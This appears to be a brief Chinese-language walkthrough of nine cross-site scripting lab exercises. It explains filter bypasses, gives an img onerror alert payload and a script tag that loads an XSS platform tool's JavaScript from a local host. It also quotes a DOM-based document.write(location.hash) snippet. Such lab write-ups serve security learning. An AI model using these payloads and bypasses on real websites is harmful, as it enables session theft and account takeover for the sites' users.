Example 1直接能看到的参数只有url中的name
Example 2直接输入不好用,首先考虑通过大小写绕过
Example3 ,大小写绕过也不行了,xss的难点主要就是各种绕过,尝试复写或者
<img src="knownsec" onerror=alert('1')> 也可以
Example4
<img src="knownsec" onerror=alert('1')> 直接莽出来
Example5
直接使用蓝莲花xss搞出来<script src="http://127.0.0.1/blue/myjs/copyright.js"></script>有工具为什么不用呢
说实话他过滤的alert。。。也不知道咋寻思的
Example6
按F12看页面,发现他被裹挟了分析之后前后闭合即可
Example7
这个稍微有点意思,还是先分析
可以发现,会把我们传进去的参数赋值给一个$a,这时候我们就不要惦记那个破1了,直接把$a弹出来就好了
//是为了注释掉后面的,因为这个<>被转义掉了,没办法去闭合
Example8
这个玩意神奇,他的问题居然在于它的表单指向居然不是固定的,稀罕事。通过更改url对这个表单进行闭合从而构成弹窗,属于有点离谱,但鉴于是直接通过url进行的还是有实际意义。
Example9
这个就属于是个特例了,因为这个玩意他只有在ie浏览器中才会生效。
<script>
document.write(location.hash.substring(1));
</script>
